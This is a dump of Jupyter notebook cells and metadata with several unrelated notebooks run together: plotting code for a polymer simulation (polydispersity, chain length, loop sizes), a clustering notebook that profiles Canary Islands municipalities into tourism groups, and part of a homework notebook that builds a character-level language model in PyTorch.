"plt.rcParams['figure.figsize'] = figsize(0.9, height_ratio=1.5)\nf, (a0, a1) = plt.subplots(2,1, gridspec_kw = {'height_ratios':[2, 1]})\n\na0.plot(scan_p0_1000_water[0.001][1]['cr']/2000, scan_p0_1000_water[0.001][1]['pn'], '*', markevery=200, color='k')\na0.plot(np.arange(0, 0.925, 0.01), 1/(1-np.arange(0, 0.925, 0.01)), label=r'1/(1-p)', linestyle='--', color='k', linewidth=1.8)\na0.set_ylabel(r'$\\langle n \\rangle$')\na0.legend()\na0.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 0.9])\n\nl = scan_p0_1000_water[0.001][1]\ntheory_val = 1/(1-l['cr']/2000)\na1.plot(l['cr']/2000, np.abs(l['pn']-theory_val), linestyle='None', marker='.', color='k')\na1.set_xlabel('p')\na1.set_ylabel(r'$|\\Delta|$')\na1.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 0.9])\nf.tight_layout()\nplt.savefig('result_graphics/average_n_with_water.pdf', dpi=200)",
"_____no_output_____"
]
],
[
[
"## with water",
"_____no_output_____"
]
],
[
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\ncr = [0.1, 0.01, 0.001]\nscan_p0_1000_water_rev = collections.defaultdict(list)\nfor f in sorted(os.listdir('scan_p_1000/with_water_rev/')):\n if f.startswith('polstat'):\n k = float(f.split('_')[2])\n if k not in cr:\n continue\n k2 = float(f.split('_')[3])\n if k2 != 0.01:\n continue\n d = np.loadtxt(os.path.join('scan_p_1000/with_water_rev/', f))\n header = open(os.path.join('scan_p_1000/with_water_rev/', f)).readline().replace('#', '').split()\n d.dtype = [(x, 'float') for x in header]\n scan_p0_1000_water_rev[k].append(d)\ninter_water_rev_pdi = collections.defaultdict(list)\np_vals = {}\n# for ss, max_cr in [(0.001, 0.32), (0.01, 0.61), (0.1, 0.86)]:\n# p_vals[ss] = np.arange(0.0, max_cr, 0.01)\n# for cr in scan_p0_1000_water_rev:\n# for l in scan_p0_1000_water_rev[cr]:\n# x = (l['cr']/2000)[:, 0]\n# y = l['pdi'][:, 0]\n# f = interpolate.interp1d(x, y)\n# ynew = f(p_vals[cr])\n# inter_water_rev_pdi[cr].append(ynew)\n# std_water_rev_pdi = {}\n# avg_water_rev_pdi = {}\n# for cr in inter_water_rev_pdi:\n# std_water_rev_pdi[cr] = np.std(np.array(inter_water_rev_pdi[cr]), axis=0)\n# avg_water_rev_pdi[cr] = np.average(inter_water_rev_pdi[cr], axis=0)",
"_____no_output_____"
],
[
"# plt.subplot(121)\nmarkers = ['h', '.', 'd']\nlegend_lines = {}\nfor i, cr in enumerate(sorted(scan_p0_1000_water_rev)):\n for l in scan_p0_1000_water_rev[cr]:\n line, = plt.plot(\n l['cr']/2000.0, \n l['pdi'], \n '.', \n markevery=100, \n marker=markers[i])\n legend_lines[cr] = line\nl, = plt.plot(np.arange(0.0, 1.0, 0.01), 1+np.arange(0.0, 1.0, 0.01), linestyle='--', color='k', linewidth=1.8, label='1+p')\nplt.legend()\n# [legend_lines[cr] for cr in sorted(scan_p0_1000_water_rev)] + [l], \n# list(map(r'$k_f={}$'.format, sorted(scan_p0_1000_water_rev.keys()))) + ['1+p'], loc=0)\nplt.annotate(r'$k_f=0.001$', xy=(0.2, 0.05), xycoords='axes fraction')\nplt.annotate(r'$k_f=0.01$', xy=(0.5, 0.3), xycoords='axes fraction')\nplt.annotate(r'$k_f=0.01$', xy=(0.5, 0.3), xycoords='axes fraction')\nplt.annotate(r'$k_f=0.1$', xy=(0.8, 0.35), xycoords='axes fraction')\nplt.annotate(r'$k_r = 0.01$', xy=(0.02, 0.72), xycoords='axes fraction', fontsize=12)\nplt.xlabel('p')\nplt.ylabel('PDI')\nplt.yticks([1.0, 1.5, 2.0])\nplt.xticks([0.0, 0.5, 1.0])\n\nplt.tight_layout()\nplt.savefig('result_graphics/average_pdi_rev_water.pdf', dpi=200)",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\n# plt.subplots_adjust(left=5, bottom=0, right=6, top=1, wspace=0, hspace=0)\nplot_margin = 0.25\n\nx0, x1, y0, y1 = plt.axis()\n\n\nlegend_lines = {}\nfor i, cr in enumerate(sorted(scan_p0_1000_water_rev)):\n for l in scan_p0_1000_water_rev[cr]:\n line, = plt.plot(\n l['pdi'], \n '.', \n markevery=100, \n marker=markers[i],\n markersize=8.0,\n color=colors[i])\n legend_lines[cr] = line\nplt.annotate(r'$k_r = 0.01$', xy=(0.01, 0.85), xycoords='axes fraction', fontsize=12)\n# plt.legend(\n# [legend_lines[cr] for cr in sorted(scan_p0_1000_water_rev)], \n# map(r'$k_f={}$'.format, sorted(scan_p0_1000_water_rev.keys())), loc=0)\nplt.annotate(r'$k_f=0.001$', xy=(0.75, 0.1), xycoords='axes fraction', color=colors[0], fontsize=12)\nplt.annotate(r'$k_f=0.01$', xy=(0.8, 0.32), xycoords='axes fraction', color=colors[1], fontsize=12)\nplt.annotate(r'$k_f=0.1$', xy=(0.8, 0.8), xycoords='axes fraction', color=colors[2], fontsize=12)\nplt.ylabel('PDI')\nplt.xlabel('simulation time (ps)')\nplt.tight_layout()\nplt.savefig('result_graphics/average_pdi_t_rev_water.pdf', dpi=200, tight_layout=True)",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9, height_ratio=1.5)\nf, (a0, a1) = plt.subplots(2,1, gridspec_kw = {'height_ratios':[2, 1]})\nmarkers = ['h', '.', 'd']\nlegend_lines = {}\nfor i, cr in enumerate(sorted(scan_p0_1000_water_rev)):\n for l in scan_p0_1000_water_rev[cr]:\n line, = a0.plot(\n l['cr']/2000.0, \n l['pn'], \n '.', \n markevery=100, \n marker=markers[i],\n color=colors[i])\n legend_lines[cr] = line\nl, = a0.plot(np.arange(0.0, 0.9, 0.01), 1.0/(1.0-np.arange(0.0, 0.9, 0.01)), 'k--', label='1/(1-p)', linewidth=1.8)\n# a0.legend(\n# [legend_lines[cr] for cr in sorted(scan_p0_1000_water_rev)] + [l], \n# list(map(r'$k_f={}$'.format, sorted(scan_p0_1000_water_rev.keys()))) + ['1/(1-p)'])\n#a0.set_xlabel('p')\na0.set_ylabel(r'$\\langle n \\rangle$')\na0.set_xticks([0.0, 0.5, 0.9])\na0.annotate(r'$k_f=0.001$', xy=(0.1, 0.15), xycoords='axes fraction', color=colors[0], fontsize=12)\na0.annotate(r'$k_f=0.01$', xy=(0.5, 0.25), xycoords='axes fraction', color=colors[1], fontsize=12)\na0.annotate(r'$k_f=0.1$', xy=(0.65, 0.55), xycoords='axes fraction', color=colors[2], fontsize=12)\na0.annotate(r'$k_r = 0.01$', xy=(0.02, 0.75), xycoords='axes fraction', fontsize=12)\na0.legend(loc=0)\n\nfor i, cr in enumerate(sorted(scan_p0_1000_water_rev)):\n for l in scan_p0_1000_water_rev[cr]:\n theory_val = 1/(1-l['cr']/2000)\n a1.plot(l['cr']/2000, np.abs(l['pn']-theory_val), color=colors[i], linestyle='None', marker=markers[i], markevery=100)\na1.set_xlabel('p')\na1.set_ylabel(r'$|\\Delta|$')\na1.set_xticks([0.0, 0.5, 0.9])\n\nf.tight_layout()\nf.savefig('result_graphics/average_pn_rev_water.pdf', dpi=200, tight_layout=True)",
"_____no_output_____"
]
],
[
[
"# Loops",
"_____no_output_____"
]
],
[
[
"import pickle\nwith open('scan_p_1000/no_water/loops.pck', 'rb') as ib:\n loops_no_water = pickle.load(ib)\n loops_no_water = [l for x in loops_no_water for l in x] \n# print np.average(loops_no_water), np.std(loops_no_water), np.min(loops_no_water), np.max(loops_no_water), np.sum(loops_no_water)\nwith open('scan_p_1000/with_water/loops.pck', 'rb') as ib:\n loops_water = pickle.load(ib)\n loops_water = [l for x in loops_water for l in x]\n# print np.average(loops_water), np.std(loops_water), np.min(loops_water), np.max(loops_water)\nwith open('scan_p_1000/with_water_rev/old/loops.pck', 'rb') as ib:\n loops_rev_water = pickle.load(ib)\n loops_rev_water = [l for x in loops_rev_water for l in x]\n# print np.average(loops_rev_water), np.std(loops_rev_water), np.min(loops_rev_water), np.max(loops_rev_water)\n\nwith open('scan_p_1000/with_water_rev/old/loops_0.1_0.01.pck', 'rb') as ib:\n loops_rev_water_01 = pickle.load(ib)\n loops_rev_water_01 = [l for x in loops_rev_water_01 for l in x]\n# print np.average(loops_rev_water_01), np.std(loops_rev_water_01), np.min(loops_rev_water_01), np.max(loops_rev_water_01)\n \nwith open('scan_p_1000/with_water_rev/old/loops_0.01_0.01.pck', 'rb') as ib:\n loops_rev_water_001 = pickle.load(ib)\n loops_rev_water_001 = [l for x in loops_rev_water_001 for l in x]\n# print np.average(loops_rev_water_001), np.std(loops_rev_water_001), np.min(loops_rev_water_001), np.max(loops_rev_water_001)\n \nwith open('scan_p_1000/with_water_rev/old/loops_0.001_0.01.pck', 'rb') as ib:\n loops_rev_water_0001 = pickle.load(ib)\n# print loops_rev_water_0001\n loops_rev_water_0001 = [l for x in loops_rev_water_0001 for l in x]\n# print np.average(loops_rev_water_0001), np.std(loops_rev_water_0001), np.min(loops_rev_water_0001), np.max(loops_rev_water_0001)",
"_____no_output_____"
],
[
"plt.rcParams['figure.figsize'] = figsize(0.9)\nplt.rc('text', usetex=True)\nn, x = np.histogram(loops_no_water, bins=range(40))\nn = np.asarray(n, dtype=float)\nn[n==0.0] = np.nan\nplt.plot(x[1:]-0.5, n, '^', label=r'no $H_2O$, $k_f=0.001$', markersize=8)\nprint(np.nansum(n))\n\nn, x = np.histogram(loops_water, bins=range(40))\nn = np.asarray(n, dtype=float)\nn[n==0.0] = np.nan\nplt.plot(x[1:]-0.5, n, 'd', label=r'$H_2O$ (no hydrolysis), $k_f=0.001$', markersize=8)\nprint(np.nansum(n))\n\nn, x = np.histogram(loops_rev_water_001, bins=range(40))\nn = np.asarray(n, dtype=float)\nn[n==0.0] = np.nan\nplt.plot(x[1:]-0.5, n, 'h', label=r'$H_2O$ (hydrolysis), $k_f/k_r=0.01/0.01$', markersize=8)\nprint(np.nansum(n))\n\nn, x = np.histogram(loops_rev_water_01, bins=range(40))\nn = np.asarray(n, dtype=float)\nn[n==0.0] = np.nan\nplt.plot(x[1:]-0.5, n, 's', label=r'$H_2O$ (hydrolysis), $k_f/k_r=0.1/0.01$', markersize=8)\nprint(np.nansum(n))\n\nxticks = np.array(list(range(0, 40, 5)))\nplt.xticks(xticks-0.5, xticks)\nplt.xlim([3, 40])\n\nplt.legend(loc=0)\nplt.xlabel('cycle size x (\\# of monomers)')\nplt.ylabel('number of cycles of size x')\n#plt.annotate(r'$k_r=0.01$', xy=(0.57, 0.64), xycoords='axes fraction', fontsize=16)\nplt.tight_layout()\nplt.savefig('result_graphics/loop_size.pdf', tight_layout=True)",
"145.0\n99.0\n3.0\n8.0\n"
],
[
"with open('scan_p_1000/no_water/loops.pck', 'rb') as ib:\n loops_no_water = pickle.load(ib)\n print(loops_no_water)\n #loops_no_water = [l for x in loops_no_water for l in x] ",
"[[10, 4, 6, 8, 4], [8, 4, 8, 10, 4, 8, 4, 4], [8, 20, 6, 6, 6, 6, 4, 6, 4, 4, 8], [4, 6, 6, 4], [8, 4, 6, 8, 4, 4, 4, 4, 6, 4, 4, 8, 4], [4, 6, 4, 4, 6, 6, 10, 4, 6, 4], [4, 4, 4, 12, 16, 4, 4, 4, 4, 4], [10, 8, 10, 4, 10, 4], [4, 34, 4, 12, 8, 6, 4, 10, 8, 4, 4], [28, 8, 6, 8, 4], [6, 8, 10, 8, 8, 6], [10, 8, 4, 4, 6, 6, 4], [16, 6, 6, 8, 6, 4, 6, 4, 4], [4, 6, 6, 4], [8, 8, 4, 4, 12, 4], [4, 6, 10, 4, 4, 4], [6, 4, 4, 4], [4, 8, 8, 4], [12, 4, 8, 6, 4, 4], [6, 20, 6, 6, 6, 4, 4, 6, 4, 4]]\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb034bca03d7bee9a12fe979f017589069a7c934 | 100,125 | ipynb | Jupyter Notebook | datathon2021/notebooks/02_Group_profiles.ipynb | Afroefras/datathon2021 | 95a96a397ae66098dce535ec86c4a9f4c4f07019 | [
"Apache-2.0"
] | null | null | null | datathon2021/notebooks/02_Group_profiles.ipynb | Afroefras/datathon2021 | 95a96a397ae66098dce535ec86c4a9f4c4f07019 | [
"Apache-2.0"
] | null | null | null | datathon2021/notebooks/02_Group_profiles.ipynb | Afroefras/datathon2021 | 95a96a397ae66098dce535ec86c4a9f4c4f07019 | [
"Apache-2.0"
] | 1 | 2021-09-19T21:15:48.000Z | 2021-09-19T21:15:48.000Z | 40.717771 | 18,591 | 0.4878 | [
[
[
"# Group profiles",
"_____no_output_____"
],
[
"## Parameters",
"_____no_output_____"
]
],
[
[
"BASE_DIR = '/Users/efraflores/Desktop/EF/Contests/Datathon_202109/data/datos'\nFOLDER_NAME = 'profiled'\nCATALOG_NAME = 'Canarias_municipios.csv'",
"_____no_output_____"
]
],
[
[
"## Import",
"_____no_output_____"
]
],
[
[
"from mariachis.models import GroupProfiles\n\ngp = GroupProfiles(BASE_DIR,FOLDER_NAME)\nprint(gp)",
"Path:\t/Users/efraflores/Desktop/EF/Contests/Datathon_202109/data/datos/profiled\nWith 7 profiled files\n"
]
],
[
[
"## Transform",
"_____no_output_____"
]
],
[
[
"df, pipe_obj = gp.full_pipeline(kbest=22, cluster_kwargs={'n_clusters':6, 'kmeans':False}, index='comunity_code', values='cluster', aggfunc=', '.join)\ndf.sample()",
"_____no_output_____"
],
[
"from mariachis.utils import tree_to_code\n\ntree_to_code(df, df.columns)",
"1.0\n if max_cards <= 22.5:\n if Valor_sum_Restaurantes <= 9433.5:\n return [[128. 0. 0. 0. 0. 0.]]\n else: # if Valor_sum_Restaurantes > 9433.5\n return [[0. 0. 0. 0. 2. 0.]]\n else: # if max_cards > 22.5\n if count_cards <= 10488.5:\n return [[0. 0. 0. 4. 0. 0.]]\n else: # if count_cards > 10488.5\n if median_cards <= 17.0:\n return [[0. 0. 2. 0. 0. 0.]]\n else: # if median_cards > 17.0\n if max_avg_amount <= 425.5900001525879:\n return [[0. 0. 0. 0. 0. 1.]]\n else: # if max_avg_amount > 425.5900001525879\n return [[0. 1. 0. 0. 0. 0.]]\n"
]
],
[
[
"## Profiles",
"_____no_output_____"
]
],
[
[
"from mariachis.utils import profiles\n\nprof = profiles(df)\n\nfor i,var in enumerate(prof.values()):\n aux = var.fillna(0)\n display(aux.style.format(\"{:.0f}\").background_gradient('Blues'))\n # aux.T.to_csv(f'Profiles_{i}.csv')",
"_____no_output_____"
],
[
"cluster_dict = {\n 'A':'Diversión para toda la familia',\n 'B':'La mejor fiesta tropical de tu vida',\n 'C':'Ruta del vino, trae tu abrigo',\n 'D':'Platillos exclusivos para tus viajes de trabajo',\n 'E':'Atrévete a la aventura',\n 'F':'Déjate consentir en la zona dorada y el mejor clima',\n}\n\ndf['final_cluster'] = df['cluster'].map(cluster_dict)\ndf['final_cluster'].value_counts(1)",
"_____no_output_____"
],
[
"import cufflinks as cf\nfrom pandas import DataFrame\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import MinMaxScaler\n\npipe_pca = Pipeline(steps=[('pre_scaler', MinMaxScaler()), ('dim_red', PCA(3))])\nX = DataFrame(pipe_pca.fit_transform(df.iloc[:,:-3]), index=df.index).join(df['final_cluster'])\n\ncf.go_offline()\nchart_size = cf.Layout(height=700, width=1100)\nX.iplot(kind='scatter3d', mode='markers', x=0, y=1, z=2, categories='final_cluster', layout=chart_size)",
"_____no_output_____"
]
],
[
[
"## Merge catalog",
"_____no_output_____"
]
],
[
[
"from pathlib import Path\nfrom pandas import read_csv\n\ncat = read_csv(Path(BASE_DIR).joinpath(CATALOG_NAME))\nfinal = df[['final_cluster']].reset_index().merge(cat)\nfinal.sample(2)",
"_____no_output_____"
]
],
[
[
"## Export",
"_____no_output_____"
]
],
[
[
"gp.export_result(final, 'grouped_3D.csv')",
"Exported succesfully!\nFile:\tgrouped_3D.csv\nPath:\t/Users/efraflores/Desktop/EF/Contests/Datathon_202109/data/datos\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb03584a018d3db1e8a441e6c01e10338b2f3203 | 148,094 | ipynb | Jupyter Notebook | week03_lm/homework_pytorch.ipynb | jkneng/nlp_course | 55c10cc2b56e725e585016142f811e55407b3da5 | [
"MIT"
] | null | null | null | week03_lm/homework_pytorch.ipynb | jkneng/nlp_course | 55c10cc2b56e725e585016142f811e55407b3da5 | [
"MIT"
] | null | null | null | week03_lm/homework_pytorch.ipynb | jkneng/nlp_course | 55c10cc2b56e725e585016142f811e55407b3da5 | [
"MIT"
] | null | null | null | 114.979814 | 47,848 | 0.70462 | [
[
[
"### Homework: going neural (6 pts)\n\nWe've checked out statistical approaches to language models in the last notebook. Now let's go find out what deep learning has to offer.\n\n<img src='https://raw.githubusercontent.com/yandexdataschool/nlp_course/master/resources/expanding_mind_lm_kn_3.png' width=300px>\n\nWe're gonna use the same dataset as before, except this time we build a language model that's character-level, not word level. Before you go:\n* If you haven't done seminar already, use `seminar.ipynb` to download the data.\n* This homework uses Pytorch v1.x: this is [how you install it](https://pytorch.org/get-started/locally/); and that's [how you use it](https://github.com/yandexdataschool/Practical_RL/tree/9f89e98d7df7ad47f5d6c85a70a38283e06be16a/week04_%5Brecap%5D_deep_learning).",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
]
],
[
[
"Working on character level means that we don't need to deal with large vocabulary or missing words. Heck, we can even keep uppercase words in text! The downside, however, is that all our sequences just got a lot longer.\n\nHowever, we still need special tokens:\n* Begin Of Sequence (__BOS__) - this token is at the start of each sequence. We use it so that we always have non-empty input to our neural network. $P(x_t) = P(x_1 | BOS)$\n* End Of Sequence (__EOS__) - you guess it... this token is at the end of each sequence. The catch is that it should __not__ occur anywhere else except at the very end. If our model produces this token, the sequence is over.\n",
"_____no_output_____"
]
],
[
[
"BOS, EOS = ' ', '\\n'\n\ndata = pd.read_json(\"./arxivData.json\")\nlines = data.apply(lambda row: (row['title'] + ' ; ' + row['summary'])[:512], axis=1) \\\n .apply(lambda line: BOS + line.replace(EOS, ' ') + EOS) \\\n .tolist()\n\n# if you missed the seminar, download data here - https://yadi.sk/d/_nGyU2IajjR9-w",
"_____no_output_____"
],
[
"lines[:3]",
"_____no_output_____"
]
],
[
[
"Our next step is __building char-level vocabulary__. Put simply, you need to assemble a list of all unique tokens in the dataset.",
"_____no_output_____"
]
],
[
[
"# get all unique characters from lines (including capital letters and symbols)\ntoken_set = set()\nlist(map(lambda x: token_set.update(x), [list(line) for line in lines])) # add list to eager execution\ntokens = list(token_set)\n",
"_____no_output_____"
],
[
"tokens = sorted(tokens)\nn_tokens = len(tokens)\nprint ('n_tokens = ',n_tokens)\nassert 100 < n_tokens < 150\nassert BOS in tokens, EOS in tokens",
"n_tokens = 136\n"
]
],
[
[
"We can now assign each character with it's index in tokens list. This way we can encode a string into a torch-friendly integer vector.",
"_____no_output_____"
]
],
[
[
"# dictionary of character -> its identifier (index in tokens list)\ntoken_to_id = {token:i for i, token in enumerate(tokens)}",
"_____no_output_____"
],
[
"assert len(tokens) == len(token_to_id), \"dictionaries must have same size\"\nfor i in range(n_tokens):\n assert token_to_id[tokens[i]] == i, \"token identifier must be it's position in tokens list\"\n\nprint(\"Seems alright!\")",
"Seems alright!\n"
]
],
[
[
"Our final step is to assemble several strings in a integet matrix `[batch_size, text_length]`. \n\nThe only problem is that each sequence has a different length. We can work around that by padding short sequences with extra _EOS_ or cropping long sequences. Here's how it works:",
"_____no_output_____"
]
],
[
[
"def to_matrix(lines, max_len=None, pad=token_to_id[EOS], dtype=np.int64):\n \"\"\"Casts a list of lines into torch-digestable matrix\"\"\"\n max_len = max_len or max(map(len, lines))\n lines_ix = np.full([len(lines), max_len], pad, dtype=dtype)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.get, lines[i][:max_len]))\n lines_ix[i, :len(line_ix)] = line_ix\n return lines_ix",
"_____no_output_____"
],
[
"#Example: cast 4 random names to matrices, pad with zeros\ndummy_lines = [\n ' abc\\n',\n ' abacaba\\n',\n ' abc1234567890\\n',\n]\nprint(to_matrix(dummy_lines))\n\n",
"[[ 1 66 67 68 0 0 0 0 0 0 0 0 0 0 0]\n [ 1 66 67 66 68 66 67 66 0 0 0 0 0 0 0]\n [ 1 66 67 68 18 19 20 21 22 23 24 25 26 17 0]]\n"
]
],
[
[
"### Neural Language Model (2 points including training)\n\nJust like for N-gram LMs, we want to estimate probability of text as a joint probability of tokens (symbols this time).\n\n$$P(X) = \\prod_t P(x_t \\mid x_0, \\dots, x_{t-1}).$$ \n\nInstead of counting all possible statistics, we want to train a neural network with parameters $\\theta$ that estimates the conditional probabilities:\n\n$$ P(x_t \\mid x_0, \\dots, x_{t-1}) \\approx p(x_t \\mid x_0, \\dots, x_{t-1}, \\theta) $$\n\n\nBut before we optimize, we need to define our neural network. Let's start with a fixed-window (aka convolutional) architecture:\n\n<img src='https://raw.githubusercontent.com/yandexdataschool/nlp_course/master/resources/fixed_window_lm.jpg' width=400px>\n",
"_____no_output_____"
]
],
[
[
"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F",
"_____no_output_____"
],
[
"class FixedWindowLanguageModel(nn.Module):\n def __init__(self, n_tokens=n_tokens, emb_size=16, hid_size=64):\n \"\"\" \n A fixed window model that looks on at least 5 previous symbols.\n \n Note: fixed window LM is effectively performing a convolution over a sequence of words.\n This convolution only looks on current and previous words.\n Such convolution can be represented as a sequence of 2 operations:\n - pad input vectors by {strides * (filter_size - 1)} zero vectors on the \"left\", do not pad right\n - perform regular convolution with {filter_size} and {strides}\n \n - If you're absolutely lost, here's a hint: use nn.ZeroPad2d((NUM_LEADING_ZEROS, 0, 0, 0))\n followed by a nn.Conv1d(..., padding=0). And yes, its okay that padding is technically \"2d\".\n \"\"\"\n super().__init__() # initialize base class to track sub-layers, trainable variables, etc.\n \n # YOUR CODE - create layers/variables and any metadata you want, e.g. self.emb = L.Embedding(...)\n \n self.emb = nn.Embedding(n_tokens, emb_size)\n self.padding = nn.ZeroPad2d((0, 0, 4, 0))\n self.kernel_size = 5\n self.conv = nn.Conv1d(emb_size, hid_size, self.kernel_size)\n self.fc = nn.Linear(hid_size, n_tokens)\n \n #END OF YOUR CODE\n \n def __call__(self, input_ix):\n \"\"\"\n compute language model logits given input tokens\n :param input_ix: batch of sequences with token indices, tensor: int32[batch_size, sequence_length]\n :returns: pre-softmax linear outputs of language model [batch_size, sequence_length, n_tokens]\n these outputs will be used as logits to compute P(x_t | x_0, ..., x_{t - 1})\n \n :note: that convolutions operate with tensors of shape [batch, channels, length], while linear layers\n and *embeddings* use [batch, length, channels] tensors. Use tensor.permute(...) to adjust shapes.\n\n \"\"\"\n # YOUR CODE - apply layers, see docstring above\n x = self.emb(input_ix)\n x = self.padding(x)\n x = x.permute(0, 2, 1)\n\n x_conv = self.conv(x)\n # x_conv = F.relu(x_conv)\n x_conv = x_conv.permute(0, 2, 1)\n \n x = self.fc(x_conv)\n \n return x # output tensor should be of shape [batch_size, sequence_length, n_tokens]\n \n def get_possible_next_tokens(self, prefix=BOS, temperature=1.0, max_len=100):\n \"\"\" :returns: probabilities of next token, dict {token : prob} for all tokens \"\"\"\n prefix_ix = torch.as_tensor(to_matrix([prefix]), dtype=torch.int64)\n with torch.no_grad():\n probs = torch.softmax(self(prefix_ix)[0, -1], dim=-1).cpu().numpy() # shape: [n_tokens]\n return dict(zip(tokens, probs))\n ",
"_____no_output_____"
],
[
"dummy_model = FixedWindowLanguageModel()\n\ndummy_input_ix = torch.as_tensor(to_matrix(dummy_lines))\ndummy_logits = dummy_model(dummy_input_ix)\n\nprint('Weights:', tuple(name for name, w in dummy_model.named_parameters()))",
"Weights: ('emb.weight', 'conv.weight', 'conv.bias', 'fc.weight', 'fc.bias')\n"
],
[
"assert isinstance(dummy_logits, torch.Tensor)\nassert dummy_logits.shape == (len(dummy_lines), max(map(len, dummy_lines)), n_tokens), \"please check output shape\"\nassert np.all(np.isfinite(dummy_logits.data.cpu().numpy())), \"inf/nan encountered\"\nassert not np.allclose(dummy_logits.data.cpu().numpy().sum(-1), 1), \"please predict linear outputs, don't use softmax (maybe you've just got unlucky)\"",
"_____no_output_____"
],
[
"# test for lookahead\ndummy_input_ix_2 = torch.as_tensor(to_matrix([line[:3] + 'e' * (len(line) - 3) for line in dummy_lines]))\ndummy_logits_2 = dummy_model(dummy_input_ix_2)\n\nassert torch.allclose(dummy_logits[:, :3], dummy_logits_2[:, :3]), \"your model's predictions depend on FUTURE tokens. \" \\\n \" Make sure you don't allow any layers to look ahead of current token.\" \\\n \" You can also get this error if your model is not deterministic (e.g. dropout). Disable it for this test.\"",
"_____no_output_____"
]
],
[
[
"We can now tune our network's parameters to minimize categorical crossentropy over training dataset $D$:\n\n$$ L = {\\frac1{|D|}} \\sum_{X \\in D} \\sum_{x_i \\in X} - \\log p(x_t \\mid x_1, \\dots, x_{t-1}, \\theta) $$\n\nAs usual with with neural nets, this optimization is performed via stochastic gradient descent with backprop. One can also note that minimizing crossentropy is equivalent to minimizing model __perplexity__, KL-divergence or maximizng log-likelihood.",
"_____no_output_____"
]
],
[
[
"def compute_mask(input_ix, eos_ix=token_to_id[EOS]):\n \"\"\" compute a boolean mask that equals \"1\" until first EOS (including that EOS) \"\"\"\n cumsum = torch.cumsum(input_ix == eos_ix, dim=-1)\n # print('cumsum', cumsum)\n # print(cumsum[..., :-1] < 1)\n return F.pad(torch.cumsum(input_ix == eos_ix, dim=-1)[..., :-1] < 1, pad=(1, 0, 0, 0), value=True)\n # return cumsum[..., :-1] < 1\n\nprint('matrix:\\n', dummy_input_ix.numpy())\nprint('mask:\\n', compute_mask(dummy_input_ix).to(torch.int32).cpu().numpy())\nprint('lengths:', compute_mask(dummy_input_ix).sum(-1).cpu().numpy())",
"matrix:\n [[ 1 66 67 68 0 0 0 0 0 0 0 0 0 0 0]\n [ 1 66 67 66 68 66 67 66 0 0 0 0 0 0 0]\n [ 1 66 67 68 18 19 20 21 22 23 24 25 26 17 0]]\nmask:\n [[1 1 1 1 1 0 0 0 0 0 0 0 0 0 0]\n [1 1 1 1 1 1 1 1 1 0 0 0 0 0 0]\n [1 1 1 1 1 1 1 1 1 1 1 1 1 1 1]]\nlengths: [ 5 9 15]\n"
],
[
"def compute_loss(model, input_ix):\n \"\"\"\n :param model: language model that can compute next token logits given token indices\n :param input ix: int32 matrix of tokens, shape: [batch_size, length]; padded with eos_ix\n :returns: scalar loss function, mean crossentropy over non-eos tokens\n \"\"\"\n input_ix = torch.as_tensor(input_ix, dtype=torch.int64)\n \n\n logits = model(input_ix[:, :-1])\n # logits = F.log_softmax(logits, dim=2)\n # print(f'logits.shape: {logits.shape}')\n reference_answers = input_ix[:, 1:]\n\n # Your task: implement loss function as per formula above\n # your loss should only be computed on actual tokens, excluding padding\n # predicting actual tokens and first EOS do count. Subsequent EOS-es don't\n # you may or may not want to use the compute_mask function from above.\n \n # input_mask = compute_mask(input_ix[:, :-1])\n input_mask = compute_mask(reference_answers)\n input_mask = torch.unsqueeze(input_mask, 2)\n # print('input_mask.shape:', input_mask.shape)\n # print('logits[0]:', logits[0])\n masked_logits = torch.mul(logits, input_mask) # 对应位相乘\n masked_logits = F.log_softmax(masked_logits, dim=2)\n # print(f'masked_logits.shape: {masked_logits.shape}')\n # celoss = nn.CrossEntropyLoss()\n # loss = celoss(masked_logits, reference_answers)\n # print(f'masked_logits.shape: {masked_logits.shape}')\n # print('reference_answers.shape, ', reference_answers.shape)\n ml = masked_logits.reshape(-1, masked_logits.size(2))\n ref = reference_answers.reshape(-1)\n # print(ref)\n loss = F.cross_entropy(ml, ref) / len(input_ix)\n # print(loss.shape)\n\n return loss\n ",
"_____no_output_____"
],
[
"input = to_matrix(dummy_lines, max_len=15)\nprint('input shape', input.shape)\nloss_1 = compute_loss(dummy_model, input)\nloss_2 = compute_loss(dummy_model, to_matrix(dummy_lines, max_len=16))\nprint(loss_1, loss_2)",
"input shape (3, 15)\ntensor(1.6738, grad_fn=<DivBackward0>) tensor(1.6714, grad_fn=<DivBackward0>)\n"
],
[
"loss_1 = compute_loss(dummy_model, to_matrix(dummy_lines, max_len=15))\nloss_2 = compute_loss(dummy_model, to_matrix(dummy_lines, max_len=16))\nassert (np.ndim(loss_1) == 0) and (0 < loss_1 < 100), \"loss must be a positive scalar\"\nassert torch.allclose(loss_1, loss_2), 'do not include AFTER first EOS into loss. '\\\n 'Hint: use compute_mask. Beware +/-1 errors. And be careful when averaging!'",
"_____no_output_____"
]
],
[
[
"### Evaluation\n\nYou will need two functions: one to compute test loss and another to generate samples. For your convenience, we implemented them both in your stead.",
"_____no_output_____"
]
],
[
[
